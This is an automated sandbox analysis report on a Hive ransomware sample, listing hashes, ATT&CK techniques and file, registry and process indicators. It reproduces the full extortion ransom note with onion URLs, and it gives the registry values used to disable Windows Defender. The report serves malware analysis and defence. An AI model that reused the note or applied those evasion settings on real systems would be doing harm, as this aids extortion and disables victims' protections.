hive | 36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-12-2024 04:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
Size

3.3MB
MD5

c5ea00ea5973347d54d66f12fb5ee242
SHA1

9ce9fe05b746d949ac3095c7b8ed70a34948a0e5
SHA256

36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e
SHA512

a6061f6d4b22f3e6561da3e2e27bbdf6e0e9ec812c2e584812d9e684c7e9dfb54c6454a8d818e65d82d89aa17e45d95a15e64e88e8ff33eab6fa284a68a1fe0f
SSDEEP

49152:Fq3j/91Zrb/TNvO90dL3BmAFd4A64nsfJeomo3d4jMQPvFPL8bg11VgjoCfEJZD1:FG91LomuSBPvqi4B

Score

10^/10

hive defense_evasion evasion execution impact ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\Program Files\phLK_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note

Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: 9PWEYLfHXq5k Password: Xtd8FiVNxskndowzYVqJ To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.vck99 files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Hive
A ransomware written in Golang first seen in June 2021.
ransomware hive
Hive family
hive

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

evasion ransomware

Clear Windows Event Logs

T1070.001

pid	Process
2116	wevtutil.exe
1432	wevtutil.exe
3832	wevtutil.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4416	bcdedit.exe
1756	bcdedit.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2056	powershell.exe
3120	powershell.exe

Modifies Security services 2 TTPs 6 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\phLK_HOW_TO_DECRYPT.txt	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-pl.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_pcghlVrN2Ww0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.scale-200.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\phLK_HOW_TO_DECRYPT.txt	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_KMS_Client-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_dL7PZh3_fXw0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Dark\Sunset.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteSmallTile.scale-125.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL__-uasMCwfIk0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-white_scale-100.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\phLK_HOW_TO_DECRYPT.txt	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.strings.psd1.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_uTxmmQZZhek0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Gdd7-K-qt-A0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-100_contrast-white.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Lumia.AppTk.NativeDirect3d.UAP\Native3d.TextureRendererVertexShader.cso	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-72_altform-unplated.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\de-DE\MSFT_PackageManagementSource.strings.psd1.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_3x3_1cL1yo40.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\phLK_HOW_TO_DECRYPT.txt	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\2876_20x20x32.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\Retail\Retail_Feedback_icon.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-36_altform-unplated.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\ui-strings.js.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Sxy_b5kzBu00.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\phLK_HOW_TO_DECRYPT.txt	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Q8H6b2FOVPI0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SmallTile.scale-200_contrast-white.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\TimerWideTile.contrast-black_scale-100.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\phLK_HOW_TO_DECRYPT.txt	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-black\LargeTile.scale-125.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Yf7e_p87DFI0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\nub.png.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_dKFr-KM-D5s0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_8B1_Sepony80.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\OperationValidationResources.psd1	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosSmallTile.contrast-white_scale-100.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\5px.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-36_altform-unplated_contrast-black.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeMediumTile.scale-400.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\ui-strings.js.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_qRox--hM9fM0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL120.XML.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_-HAMpoQ_SmY0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteWideTile.scale-125.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\WINGDNG2.TTF.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_xrwb8q1Hfws0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-36_altform-lightunplated.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_g2yrrQJPhUk0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\phLK_HOW_TO_DECRYPT.txt	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Config\ShellPreviewConfig.json	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\GameBar_AppList.targetsize-48_altform-unplated.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_anonymoususer_18.svg.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_H1LmB3GTWWo0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_cRrzThFP5DI0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubStoreLogo.scale-125_contrast-high.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\199.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-36_contrast-black.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsStoreLogo.scale-100.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookWideTile.scale-150.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\as80.xsl.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Z5Z5JBCwLCA0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\SmallTile.scale-125.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-64_altform-unplated_contrast-black.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\Xbox360PurchaseHostPage.html	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\ThirdPartyNotices.txt.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_2Ze_Hfkbkeo0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-80_altform-lightunplated.png	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\Services\phLK_HOW_TO_DECRYPT.txt	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_selected_18.svg.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_GpjOaVZxo2E0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_upi0tBIsSag0.vck99	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\phLK_HOW_TO_DECRYPT.txt	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
652	sc.exe
3896	sc.exe
4480	sc.exe
2064	sc.exe
2804	sc.exe
3668	sc.exe
3048	sc.exe
3572	sc.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2916	vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2056	powershell.exe
2056	powershell.exe
3120	powershell.exe
3120	powershell.exe
4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe
4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	1432	wevtutil.exe
Token: SeBackupPrivilege	1432	wevtutil.exe
Token: SeSecurityPrivilege	3832	wevtutil.exe
Token: SeBackupPrivilege	3832	wevtutil.exe
Token: SeSecurityPrivilege	2116	wevtutil.exe
Token: SeBackupPrivilege	2116	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	3648	wmic.exe
Token: SeSecurityPrivilege	3648	wmic.exe
Token: SeTakeOwnershipPrivilege	3648	wmic.exe
Token: SeLoadDriverPrivilege	3648	wmic.exe
Token: SeSystemProfilePrivilege	3648	wmic.exe
Token: SeSystemtimePrivilege	3648	wmic.exe
Token: SeProfSingleProcessPrivilege	3648	wmic.exe
Token: SeIncBasePriorityPrivilege	3648	wmic.exe
Token: SeCreatePagefilePrivilege	3648	wmic.exe
Token: SeBackupPrivilege	3648	wmic.exe
Token: SeRestorePrivilege	3648	wmic.exe
Token: SeShutdownPrivilege	3648	wmic.exe
Token: SeDebugPrivilege	3648	wmic.exe
Token: SeSystemEnvironmentPrivilege	3648	wmic.exe
Token: SeRemoteShutdownPrivilege	3648	wmic.exe
Token: SeUndockPrivilege	3648	wmic.exe
Token: SeManageVolumePrivilege	3648	wmic.exe
Token: 33	3648	wmic.exe
Token: 34	3648	wmic.exe
Token: 35	3648	wmic.exe
Token: 36	3648	wmic.exe
Token: SeIncreaseQuotaPrivilege	4888	wmic.exe
Token: SeSecurityPrivilege	4888	wmic.exe
Token: SeTakeOwnershipPrivilege	4888	wmic.exe
Token: SeLoadDriverPrivilege	4888	wmic.exe
Token: SeSystemProfilePrivilege	4888	wmic.exe
Token: SeSystemtimePrivilege	4888	wmic.exe
Token: SeProfSingleProcessPrivilege	4888	wmic.exe
Token: SeIncBasePriorityPrivilege	4888	wmic.exe
Token: SeCreatePagefilePrivilege	4888	wmic.exe
Token: SeBackupPrivilege	4888	wmic.exe
Token: SeRestorePrivilege	4888	wmic.exe
Token: SeShutdownPrivilege	4888	wmic.exe
Token: SeDebugPrivilege	4888	wmic.exe
Token: SeSystemEnvironmentPrivilege	4888	wmic.exe
Token: SeRemoteShutdownPrivilege	4888	wmic.exe
Token: SeUndockPrivilege	4888	wmic.exe
Token: SeManageVolumePrivilege	4888	wmic.exe
Token: 33	4888	wmic.exe
Token: 34	4888	wmic.exe
Token: 35	4888	wmic.exe
Token: 36	4888	wmic.exe
Token: SeIncreaseQuotaPrivilege	4888	wmic.exe
Token: SeSecurityPrivilege	4888	wmic.exe
Token: SeTakeOwnershipPrivilege	4888	wmic.exe
Token: SeLoadDriverPrivilege	4888	wmic.exe
Token: SeSystemProfilePrivilege	4888	wmic.exe
Token: SeSystemtimePrivilege	4888	wmic.exe
Token: SeProfSingleProcessPrivilege	4888	wmic.exe
Token: SeIncBasePriorityPrivilege	4888	wmic.exe
Token: SeCreatePagefilePrivilege	4888	wmic.exe
Token: SeBackupPrivilege	4888	wmic.exe
Token: SeRestorePrivilege	4888	wmic.exe
Token: SeShutdownPrivilege	4888	wmic.exe
Token: SeDebugPrivilege	4888	wmic.exe
Token: SeSystemEnvironmentPrivilege	4888	wmic.exe
Token: SeRemoteShutdownPrivilege	4888	wmic.exe
Token: SeUndockPrivilege	4888	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4768 wrote to memory of 2472	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	83
PID 4768 wrote to memory of 2472	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	83
PID 2472 wrote to memory of 4404	2472	net.exe	85
PID 2472 wrote to memory of 4404	2472	net.exe	85
PID 4768 wrote to memory of 4536	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	86
PID 4768 wrote to memory of 4536	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	86
PID 4536 wrote to memory of 1660	4536	net.exe	88
PID 4536 wrote to memory of 1660	4536	net.exe	88
PID 4768 wrote to memory of 820	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	89
PID 4768 wrote to memory of 820	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	89
PID 820 wrote to memory of 1860	820	net.exe	91
PID 820 wrote to memory of 1860	820	net.exe	91
PID 4768 wrote to memory of 728	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	92
PID 4768 wrote to memory of 728	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	92
PID 728 wrote to memory of 4344	728	net.exe	94
PID 728 wrote to memory of 4344	728	net.exe	94
PID 4768 wrote to memory of 2452	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	95
PID 4768 wrote to memory of 2452	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	95
PID 2452 wrote to memory of 4160	2452	net.exe	97
PID 2452 wrote to memory of 4160	2452	net.exe	97
PID 4768 wrote to memory of 4240	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	98
PID 4768 wrote to memory of 4240	4768	c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe	98
PID 4240 wrote to memory of 5000	4240	net.exe	100
PID 4240 wrote to memory of 5000	4240	net.exe	100
